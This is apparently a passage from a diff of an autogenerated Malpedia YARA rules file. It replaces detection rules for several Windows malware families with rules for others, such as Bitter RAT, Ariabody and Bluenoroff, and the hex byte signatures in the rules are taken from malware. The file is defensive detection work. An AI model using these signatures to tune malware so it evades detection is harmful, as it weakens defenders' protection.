+rule MALPEDIA_Win_Bitter_Rat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5f4150a2-2cfd-5b67-9d04-7b313480e620"
+		id = "b3eda11e-9841-5a64-a760-3d15b12e8c6a"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kagent"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.kagent_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bitter_rat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.bitter_rat_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "c73f32fc029a7be975356173769505731b12b0db3312b7f6e0626dcf79b9cedc"
+		logic_hash = "0cafad6913e5947920a6576295487b4fcd67fc675f1ae39a216d82d179786bf2"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -112158,32 +112237,32 @@ rule MALPEDIA_Win_Kagent_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d45f4 64a300000000 8bf9 833d????????00 7516 32c0 8b4df4 }
-		$sequence_1 = { 50 e8???????? 83c404 897e40 8b4604 3bc7 }
-		$sequence_2 = { 8bcb e8???????? 8343180c 33c0 33f6 3903 }
-		$sequence_3 = { 50 50 52 e8???????? 8b45ec 50 }
-		$sequence_4 = { 8bcf ffd2 8b4508 5f 895e04 8906 5b }
-		$sequence_5 = { 2bc7 d1f8 8d1442 5f 895614 5e b83f000000 }
-		$sequence_6 = { e8???????? 89435c c6436001 8b4b5c }
-		$sequence_7 = { 83ff3a 0f84b2030000 83ff3b 0f84a9030000 66833857 0f85f9020000 668378023b }
-		$sequence_8 = { 2bc8 8bf9 897da4 eb0a c745a400000000 8b7da4 8b5214 }
-		$sequence_9 = { 8b45f0 83e3fd 85c0 7409 50 e8???????? 83c404 }
+		$sequence_0 = { e8???????? 83c404 898558d9ffff 8b8558d9ffff }
+		$sequence_1 = { 50 68???????? e8???????? 83c40c 8b45f8 83c002 8945f8 }
+		$sequence_2 = { 8bf4 8d853cecffff 50 ff15???????? 3bf4 e8???????? 52 }
+		$sequence_3 = { 40 ff05???????? f7460c0c010000 754e 53 57 8d3c8518104700 }
+		$sequence_4 = { 57 8d3c8500124700 8b07 83e61f }
+		$sequence_5 = { ff15???????? 3bf4 e8???????? 8985e0fbffff e8???????? 0fb6852bfcffff 85c0 }
+		$sequence_6 = { 8dbdf4fdffff b983000000 b8cccccccc f3ab }
+		$sequence_7 = { 8d8dccd8ffff 51 6a01 8d95d8d8ffff 52 a1???????? 50 }
+		$sequence_8 = { 83c40c 8bf4 6804010000 68???????? 6a00 }
+		$sequence_9 = { 53 56 57 8dbd94dbffff b91b090000 b8cccccccc }
 
 	condition:
-		7 of them and filesize < 4972544
+		7 of them and filesize < 1130496
 }
-rule MALPEDIA_Win_Fk_Undead_Auto : FILE
+rule MALPEDIA_Win_Aveo_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "09ebce3e-04fb-58d5-b09d-0377a5f5743c"
+		id = "2f9547a9-d06a-5a97-a838-f674793ec8c9"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fk_undead"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.fk_undead_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.aveo"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.aveo_auto.yar#L1-L117"
 		license_url = "N/A"
-		logic_hash = "abdf12f66e02014f48d8c0536c0de5b8efd3d3aad1408262170db0f8bbb09349"
+		logic_hash = "b370a3150ecdba2fa7b9c1b3f8a88674c2ef9b3deea9a9096a8ec474751f8a90"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -112197,32 +112276,32 @@ rule MALPEDIA_Win_Fk_Undead_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 741e 8d4c2428 51 8b4c2424 8d542428 52 56 }
-		$sequence_1 = { 81c2fcff0000 3bd6 7303 894d00 8b4500 33c9 668908 }
-		$sequence_2 = { 0f8290000000 81394e544c4d 0f8584000000 81790453535000 757b 8b4108 3b05???????? }
-		$sequence_3 = { eb2b 8b54242c 68???????? 68???????? 68???????? 68???????? 55 }
-		$sequence_4 = { e8???????? 8b0b 8d042f 66894114 8b13 b81c000000 66894216 }
-		$sequence_5 = { 3a5608 7514 0fb74616 0fb74f16 03c6 50 03cf }
-		$sequence_6 = { 52 50 33ff 51 897c2420 e8???????? 8b5c2420 }
-		$sequence_7 = { 57 6812270000 56 e8???????? 6a00 682c4e0000 56 }
-		$sequence_8 = { 8906 33c0 c7466428e40410 c7466800000000 c7466c00000000 c7464000000000 c7869800000000000000 }
-		$sequence_9 = { 7414 8bd1 c1f805 83e21f c1e206 031485e0650a10 eb02 }
+		$sequence_0 = { 59 59 8b7508 8d34f550154100 391e 7404 }
+		$sequence_1 = { 53 56 57 8db570faffff }
+		$sequence_2 = { 8d8d10feffff e8???????? 8b95f8fdffff 52 8bf0 }
+		$sequence_3 = { 8b4de0 8d55dc 52 6800008000 }
+		$sequence_4 = { 52 8d85f4fbffff 68???????? 50 e8???????? }
+		$sequence_5 = { 50 f3a4 ff15???????? 6800010000 8d8df8feffff 6a00 51 }
+		$sequence_6 = { 53 8d4802 8955f4 56 8a51fe }
+		$sequence_7 = { 7424 8b85f4efffff 3bc7 741a }
+		$sequence_8 = { c7442418e8030000 ff15???????? 3bc7 740c 68???????? 50 }
+		$sequence_9 = { c7430801000000 e8???????? 6a06 89430c 8d4310 8d89d41a4100 5a }
 
 	condition:
-		7 of them and filesize < 1418240
+		7 of them and filesize < 180224
 }
-rule MALPEDIA_Win_Pubload_Auto : FILE
+rule MALPEDIA_Win_Ariabody_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "741d7af0-0900-5fc5-83bc-80e761b9b4ce"
+		id = "09c48148-a35c-5dbf-9884-3f4ca9e8942d"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pubload"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.pubload_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ariabody"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ariabody_auto.yar#L1-L167"
 		license_url = "N/A"
-		logic_hash = "5f25f978a9edba85952ac66b5108bbd65875055e22860f7df1e90762255be210"
+		logic_hash = "d2889556cedcf38c4ea9e1f0b840f1fda159a165dc69125aae39d5a13e01fecd"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -112236,32 +112315,38 @@ rule MALPEDIA_Win_Pubload_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6a5c 68???????? e8???????? 83c408 33c9 }
-		$sequence_1 = { 6a00 ff15???????? 6a5c 68???????? e8???????? 83c408 33c9 }
-		$sequence_2 = { 6804010000 68???????? 6a00 ff15???????? 6a5c 68???????? }
-		$sequence_3 = { ff15???????? 6a5c 68???????? e8???????? 83c408 33c9 }
-		$sequence_4 = { 68???????? e8???????? 83c408 33c9 68???????? }
-		$sequence_5 = { 6804010000 68???????? 6a00 ff15???????? 6a5c 68???????? e8???????? }
-		$sequence_6 = { e8???????? 83c408 33c9 68???????? }
-		$sequence_7 = { 68???????? e8???????? 83c408 33c9 68???????? 66894802 ff15???????? }
-		$sequence_8 = { 83c408 33c9 68???????? 66894802 ff15???????? }
-		$sequence_9 = { 6a00 6a00 6a00 ff15???????? c3 }
+		$sequence_0 = { 2bd1 8a01 84c0 7406 3ac3 7402 }
+		$sequence_1 = { 8d55fc 03f9 e8???????? 59 }
+		$sequence_2 = { eb13 8b16 8bcf e8???????? }
+		$sequence_3 = { 8bcf 0fb6c0 50 ff75fc }
+		$sequence_4 = { 50 ff5204 8b1e 8bd0 }
+		$sequence_5 = { 50 8d040a 50 57 }
+		$sequence_6 = { 8d0c30 ffd1 8bc6 5f }
+		$sequence_7 = { 83ec50 53 57 8bd9 }
+		$sequence_8 = { 4889e9 8984247a020000 c784248e02000032303000 c7842460020000434f4e4e }
+		$sequence_9 = { 4c03f7 4c8b4c3d00 4c8d6c2f08 4d85c9 7444 48bd0000000000000080 4985e9 }
+		$sequence_10 = { ff15???????? 488d15e5780000 483305???????? 488bcb 488905???????? ff15???????? 488d15df780000 }
+		$sequence_11 = { 488b81f0000000 488bd9 4885c0 7479 488d0ddad00000 483bc1 }
+		$sequence_12 = { e9???????? 8b45dc 8d1400 8955dc eb47 488d0d648bffff 4c8d4ddc }
+		$sequence_13 = { 4881eca8020000 4889d7 4889ce 4d89c4 33d2 41b800010000 33c0 }
+		$sequence_14 = { 448850d2 448850d3 448850d4 448850d5 448850d6 448858d7 c740d80b010000 }
+		$sequence_15 = { 488d942492020000 ff96b8010000 4889e9 488d942420020000 ff96b8010000 4889e9 }
 
 	condition:
-		7 of them and filesize < 524288
+		7 of them and filesize < 253952
 }
-rule MALPEDIA_Win_Cryptoshuffler_Auto : FILE
+rule MALPEDIA_Win_Bluenoroff_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f4c7e6b7-7f12-5acd-8436-2c3134e8001d"
+		id = "87ca0fae-dc2d-5a54-9ef5-56b7a04644cb"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptoshuffler"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.cryptoshuffler_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bluenoroff"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.bluenoroff_auto.yar#L1-L126"
 		license_url = "N/A"
-		logic_hash = "4b559d81f694922613ae9b35eca370b9546b803a67169819f510f86751d1ed9d"
+		logic_hash = "02d8b21ae6c3a55707ae999f347bdd0e2eb71f8cb543624eb25090baef53d3be"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -112275,32 +112360,32 @@ rule MALPEDIA_Win_Cryptoshuffler_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7777 8bd8 53 e8???????? 83c404 8b7de8 b8abaaaa2a }
-		$sequence_1 = { 833e00 7568 6a10 e8???????? 8bf8 83c404 897d08 }
-		$sequence_2 = { 7ed0 83c8ff eb07 8b04f5740f0210 5f 5e 5b }
-		$sequence_3 = { 8500 ebe7 53 8bdc 51 }
-		$sequence_4 = { e9???????? 8d4e10 51 50 }
-		$sequence_5 = { 8bf1 e8???????? 8bd0 0f57c0 83c404 8955fc }
-		$sequence_6 = { 8bc1 3914c5f84c0210 7408 40 }
-		$sequence_7 = { 57 e8???????? 83c404 8933 c6430400 8bc3 8b4df4 }
-		$sequence_8 = { e8???????? 85c0 0f8550feffff 5f 5e 5b 8b4c2428 }
-		$sequence_9 = { 0f82a5040000 8b4c2410 40 3d00100000 722a f6c11f 0f8562050000 }
+		$sequence_0 = { 68ffff0000 50 e8???????? 8b4508 83c41c 83f801 750e }
+		$sequence_1 = { 68ffff0000 50 e8???????? 33c0 83c41c 8d95ecfffeff 33c9 }
+		$sequence_2 = { 8bec b804000100 e8???????? a1???????? 33c5 8945fc 68ffff0000 }
+		$sequence_3 = { 8b45f8 40 81c348040000 8945f8 3b45ec 7c8e }
+		$sequence_4 = { b8b9757907 f7e2 c1ea05 83c40c 8955ec 895df8 3bd3 }
+		$sequence_5 = { 885431ff 0fb6550b 881430 81f900010000 7ccb 5f }
+		$sequence_6 = { 83c40c 8955ec 895df8 3bd3 }
+		$sequence_7 = { 8bf0 83c408 85f6 743a 8d85fcfffeff 50 }
+		$sequence_8 = { a1???????? 33c5 8945fc 56 68ffff0000 8d85fdfffeff 6a00 }
+		$sequence_9 = { 83c709 57 894e04 e8???????? 83c40c }
 
 	condition:
-		7 of them and filesize < 425984
+		7 of them and filesize < 303104
 }
-rule MALPEDIA_Win_Data_Exfiltrator_Auto : FILE
+rule MALPEDIA_Win_Threebyte_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "1c3e80a4-d035-5215-adaa-66329eac9671"
+		id = "db751837-d9fe-5bbc-8e37-81fa1047a177"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.data_exfiltrator"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.data_exfiltrator_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.threebyte"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.threebyte_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "6297c1d8a56d8255bac738410a860d5a8da8f6a36d36d069cc390dc91a10d95e"
+		logic_hash = "b532d976fb568c958de01f6c83348e2db5990a266537c8833f6f4b97f2236efc"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -112314,32 +112399,32 @@ rule MALPEDIA_Win_Data_Exfiltrator_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 488b442408 c60000 488b442408 48c7404000000000 488b442408 }
-		$sequence_1 = { c684248a0000008a c684248b0000007b c684248c00000084 c684248d00000085 }
-		$sequence_2 = { 4889842490000000 488d842410010000 488d8c2490000000 488bf8 488bf1 }
-		$sequence_3 = { 33c0 e9???????? 488b442420 488b4018 488b4020 4889442430 }
-		$sequence_4 = { c68424a50000004a c68424a600000070 c68424a700000077 c68424a800000069 c68424a900000077 c68424aa00000074 c68424ab0000006c }
-		$sequence_5 = { 56 57 4881ecb8000000 c744242000000000 33d2 488b8424d0000000 488b4040 }
-		$sequence_6 = { 48837c24300a 7d10 488b442430 4883c030 4889442438 eb1a 488b442430 }
-		$sequence_7 = { ff15???????? 4889842480000000 eb13 488b4c2478 ff15???????? 4889842480000000 }
-		$sequence_8 = { e8???????? 8bc0 41b840000000 ba00300000 8bc8 e8???????? 4889442468 }
-		$sequence_9 = { 4889542410 48894c2408 4883ec48 ff15???????? 41b8ffff0000 ba08000000 488bc8 }
+		$sequence_0 = { 85c0 7411 8b55b8 52 ff15???????? 33c0 e9???????? }
+		$sequence_1 = { 8b85f0fdffff 8b08 8b95f0fdffff 52 ff510c 8985ecfdffff 83bdecfdffff00 }
+		$sequence_2 = { c78524f7ffff00000000 c78514f7ffff00000000 8d8514f7ffff 50 8b8d18f7ffff 2b8d24f7ffff }
+		$sequence_3 = { c6851cf8ffff73 c6851df8ffff00 8d85ccfcffff 50 6804010000 ff15???????? 8d8decfeffff }
+		$sequence_4 = { c685d2fdffff74 c685d3fdffff65 c685d4fdffff72 c685d5fdffff6e c685d6fdffff65 c685d7fdffff74 c685d8fdffff20 }
+		$sequence_5 = { ff500c 8b4df0 51 e8???????? 83c404 83c8ff e9???????? }
+		$sequence_6 = { 50 e8???????? 83c408 8945cc e9???????? c6852cfeffff77 c6852dfeffff69 }
+		$sequence_7 = { 8d956cf7ffff 52 e8???????? 83c418 6a00 6800000004 }
+		$sequence_8 = { 83c101 51 6a00 8b9520f7ffff 52 e8???????? 83c40c }
+		$sequence_9 = { c68515feffff75 c68516feffff6e c68517feffff20 c68518feffff00 c68524feffff73 c68525feffff6c c68526feffff65 }
 
 	condition:
-		7 of them and filesize < 107520
+		7 of them and filesize < 180224
 }
-rule MALPEDIA_Win_Keymarble_Auto : FILE
+rule MALPEDIA_Win_Wormhole_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d1987e31-8cfb-500b-b69a-7c2a019e7ea8"
+		id = "e1610a26-8f6a-525e-a150-ab4ce6e346e4"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.keymarble"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.keymarble_auto.yar#L1-L114"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.wormhole"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.wormhole_auto.yar#L1-L118"
 		license_url = "N/A"
-		logic_hash = "04e65eb3ae3b01821122573e8815ad5d48f3cdd5d412f7107b80ce95c7695b7b"
+		logic_hash = "98b6efb48ef674cd1e4efeda549804876add0f8847a14dfa9ff2b839bd666e8b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -112353,34 +112438,34 @@ rule MALPEDIA_Win_Keymarble_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff15???????? 50 e8???????? 83c404 56 6a40 ff15???????? }
-		$sequence_1 = { 83c408 85c0 7407 bb7a452301 }
-		$sequence_2 = { 50 ff15???????? 68???????? 6a40 }
-		$sequence_3 = { e8???????? 83c404 e8???????? 8d3470 81e6ffffff7f }
-		$sequence_4 = { e8???????? 83c408 85c0 7407 bb7a452301 }
-		$sequence_5 = { e8???????? 83c404 56 6a40 }
-		$sequence_6 = { ff15???????? 50 ff15???????? 68???????? 6a40 }
-		$sequence_7 = { e8???????? 83c404 56 6a40 ff15???????? }
-		$sequence_8 = { 6a00 6a03 6800000040 57 ffd6 }
-		$sequence_9 = { 56 e8???????? 68???????? ff15???????? 8bf0 85f6 }
+		$sequence_0 = { 6a00 6a00 6a00 6808000100 51 }
+		$sequence_1 = { 48 83c880 40 83c040 }
+		$sequence_2 = { 85c0 7e0f 2bf0 03f8 85f6 7fc8 5f }
+		$sequence_3 = { 83c880 40 83c040 89442418 50 }
+		$sequence_4 = { 8b6c2420 8b5c2414 8b7c2418 6a00 }
+		$sequence_5 = { ffd3 8b35???????? 8d44240c 8b4c2410 50 51 ffd6 }
+		$sequence_6 = { 6a78 8d542410 50 52 57 e8???????? }
+		$sequence_7 = { 52 57 e8???????? 83c410 85c0 748f }
+		$sequence_8 = { 52 ffd6 8b44240c 8b4c2414 50 }
+		$sequence_9 = { 6a00 51 6a02 89442424 ffd3 }
 
 	condition:
-		7 of them and filesize < 1146880
+		7 of them and filesize < 99576
 }
-rule MALPEDIA_Win_Sisfader_Auto : FILE
+rule MALPEDIA_Win_Starsypound_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ac94263f-1708-5e52-9df6-f609af38fa64"
+		id = "70e37162-3a73-596a-8d7d-42b9d85b78f7"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sisfader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.sisfader_auto.yar#L1-L276"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.starsypound"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.starsypound_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "5ae29b623b53b54fbc47f6ef4a5785e5e7b4cfe669d9c31d6f6094ced51ab6b7"
+		logic_hash = "abf4ae91c4287e1227ba24bd55f61dc3c1250c1b8b21f760166157e29806933f"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -112392,52 +112477,32 @@ rule MALPEDIA_Win_Sisfader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 85c9 741f 33c0 85c9 7419 }
-		$sequence_1 = { e8???????? 85c0 b91d000000 0f44d9 }
-		$sequence_2 = { 33d2 b901000000 e8???????? eb67 }
-		$sequence_3 = { 83c801 8945f0 8b4df0 894de4 }
-		$sequence_4 = { 53 56 57 6810010000 6a40 }
-		$sequence_5 = { 81eca8010000 8d855cfeffff 53 56 }
-		$sequence_6 = { 8b040a 50 ff15???????? a3???????? }
-		$sequence_7 = { 33c9 0f8543ffffff 8b55f8 52 ff15???????? 8be5 }
-		$sequence_8 = { 8906 8b442470 89442440 8b44246c }
-		$sequence_9 = { 837c242001 7402 eb05 e8???????? b801000000 }
-		$sequence_10 = { 8b442430 8905???????? c705????????07000000 8b442438 8905???????? c705????????00000000 8b442440 }
-		$sequence_11 = { 6a00 6a00 6a01 e8???????? 83c40c eb38 }
-		$sequence_12 = { c705????????00000000 6a01 6a00 6a02 e8???????? }
-		$sequence_13 = { 837c242003 745d 837c242004 7479 837c242005 }
-		$sequence_14 = { 0fb74816 81e100200000 7409 c745d801000000 }
-		$sequence_15 = { 7e08 03d8 3bdf 7c98 }
-		$sequence_16 = { 0f108f48010000 0f110d???????? 0f10872e010000 0f118600010000 ff15???????? }
-		$sequence_17 = { 83c418 b842000000 6bc800 8b5510 0fb7440a40 }
-		$sequence_18 = { 7411 6683f92e 7509 66399db0010000 7402 ffc7 }
-		$sequence_19 = { e8???????? 33c0 83f801 7425 }
-		$sequence_20 = { 5d c3 8b450c b986000000 56 57 6a00 }
-		$sequence_21 = { c3 b82b050000 5f 5e 5b }
-		$sequence_22 = { 89442420 837c242001 7425 837c242002 7441 837c242003 745d }
-		$sequence_23 = { 89442450 837c245000 7405 e9???????? 83bc248000000000 7539 }
-		$sequence_24 = { 0f108348010000 0f1105???????? 0f10832e010000 0f1187e0000000 ff15???????? 8bf0 8d9ff0000000 }
-		$sequence_25 = { eb12 c744245401000000 33c0 85c0 0f850fffffff }
-		$sequence_26 = { c744240cdcff0000 740c b818000000 5f }
-		$sequence_27 = { 8b45ec 50 8b4dd4 51 e8???????? }
-		$sequence_28 = { 7464 6683bdcc0100002e 751c 0fb785ce010000 }
-		$sequence_29 = { 894708 817908020f0000 0f8573010000 83790410 c7442470dcff0000 740d }
+		$sequence_0 = { ff15???????? 8dbc2458010000 83c9ff 33c0 }
+		$sequence_1 = { 68???????? 52 e8???????? 83c420 85c0 7444 8b5304 }
+		$sequence_2 = { 53 56 57 6a18 e8???????? 8bb42424040000 }
+		$sequence_3 = { 8d4c2428 68???????? 51 e8???????? 56 8d542434 }
+		$sequence_4 = { 8bfd 8d44240c f3a5 8b5500 8b3d???????? 6a00 }
+		$sequence_5 = { 885c3438 c744241804010000 ff15???????? 8dbc2458010000 83c9ff 33c0 }
+		$sequence_6 = { 50 8d4c2424 56 51 52 }
+		$sequence_7 = { f3a4 885c0444 bf???????? 83c9ff 33c0 33f6 }
+		$sequence_8 = { 83c40c 85c0 7e2b eb08 }
+		$sequence_9 = { e8???????? 68c0270900 ff15???????? e8???????? 5f }
 
 	condition:
-		7 of them and filesize < 417792
+		7 of them and filesize < 40960
 }
-rule MALPEDIA_Win_Listrix_Auto : FILE
+rule MALPEDIA_Win_Jssloader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f00b612a-8ee6-5314-b10b-7290e9e1e604"
+		id = "90fc04b9-9652-536e-8f60-72fc9a34063b"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.listrix"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.listrix_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.jssloader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.jssloader_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "2287c5f695d49f8318bd5f0c78a77cdf4d2c441f03bbfda75594fd76fd20827f"
+		logic_hash = "97165a1c6774cf73430e22299a3df7b55ab3c7ba699c480d4641c6a6e116c33b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -112451,32 +112516,32 @@ rule MALPEDIA_Win_Listrix_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d8dc0f5ffff 51 ffd3 85c0 7454 57 }
-		$sequence_1 = { 85f6 740d f68594f5ffff10 0f84ac010000 8b1d???????? 68???????? 8d85c0f5ffff }
-		$sequence_2 = { 8d46ff 50 8b8584f5ffff 51 52 50 8d8df4fbffff }
-		$sequence_3 = { 8d85f4f7ffff 50 ff15???????? 8b7518 }
-		$sequence_4 = { 89b588f5ffff 397510 0f8e4c020000 57 8d85f4f7ffff 50 }
-		$sequence_5 = { 50 8d4c2470 51 c744242430794000 }
-		$sequence_6 = { c1e802 89442408 c744240c02000000 85c0 0f8408010000 }
-		$sequence_7 = { 8bc7 c1f805 c1e606 033485e0ad4000 8b45f8 8b00 }
-		$sequence_8 = { a1???????? c705????????cc274000 8935???????? a3???????? ff15???????? a3???????? }
-		$sequence_9 = { 6a00 8d95e4f9ffff 52 ff15???????? 85c0 0f84bb000000 }
+		$sequence_0 = { b8ffffff7f 8b5110 2bc2 83f802 0f82a7030000 83791410 }
+		$sequence_1 = { 8bf8 83e73f 6bdf38 031c95701d4400 b9???????? }
+		$sequence_2 = { 50 e8???????? 83a6701d440000 59 83c604 81fe00020000 72dd }
+		$sequence_3 = { c745d40f000000 c645c000 e8???????? 8d8df4feffff c745fc00000000 e8???????? 8d4dc0 }
+		$sequence_4 = { 8d8d7cfcffff e8???????? 83bd30fdffff10 8d951cfdffff ffb52cfdffff 0f43951cfdffff }
+		$sequence_5 = { c68500feffff00 e8???????? c645fc1d 8d8d18feffff 6a07 68???????? c78528feffff00000000 }
+		$sequence_6 = { 83c604 c700???????? 56 e8???????? 8b45e4 8b4dec 8945ec }
+		$sequence_7 = { 68???????? 68???????? 6a00 c745b400000000 c745b80f000000 c645a400 ff15???????? }
+		$sequence_8 = { 0f8483000000 eb7d 8b1c9d58414300 6800080000 6a00 53 ff15???????? }
+		$sequence_9 = { 8bd6 7202 8b16 ff7610 8bc8 }
 
 	condition:
-		7 of them and filesize < 106496
+		7 of them and filesize < 581632
 }
-rule MALPEDIA_Win_Lowzero_Auto : FILE
+rule MALPEDIA_Win_Multigrain_Pos_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "2e1f2236-1021-58b7-bec6-2914502da5b8"
+		id = "72a7f3f7-5585-5b52-9f6b-6aafeee8dfc7"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lowzero"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.lowzero_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.multigrain_pos"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.multigrain_pos_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "8a0cc8f946fea76f2b3b346672d13b547cb8ca0c916aea88c757b9309e0ee850"
+		logic_hash = "20f055bfbc8013c86389227ab88ba0d8272e12b77bffca2ef889258bc8b1eb3c"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -112490,32 +112555,32 @@ rule MALPEDIA_Win_Lowzero_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 53 ffd0 85c0 750a 685a040000 e9???????? c7471001000000 }
-		$sequence_1 = { 7439 03c3 837f1400 7425 }
-		$sequence_2 = { 8b45d4 89473c 8b441154 3945f4 7318 6a0d ff15???????? }
-		$sequence_3 = { 47 2bc8 8d4602 03c3 3b450c }
-		$sequence_4 = { e8???????? 83c40c 03f3 eb0b 2bce 8a0431 }
-		$sequence_5 = { 8945f0 8945d8 eb25 8b03 }
-		$sequence_6 = { 0fb61f 83c307 47 0fb607 47 2bc8 }
-		$sequence_7 = { 56 e8???????? 8b55fc 8bca 57 8b423c 8b55f4 }
-		$sequence_8 = { 2bca 49 83fb07 7507 0fb61f 83c307 }
-		$sequence_9 = { 6a01 53 ffd0 85c0 750a 685a040000 }
+		$sequence_0 = { e8???????? 83c404 33c0 837dd408 c745bc07000000 c745b800000000 }
+		$sequence_1 = { 50 6a00 6a02 6a10 68120000a0 }
+		$sequence_2 = { 730d 0fb64c1e01 c1e905 894df4 }
+		$sequence_3 = { c745f400000000 c645e400 e8???????? 57 e8???????? 83c404 8d45e4 }
+		$sequence_4 = { 8b8760040000 50 ff30 8d45fc 50 8d8f60040000 }
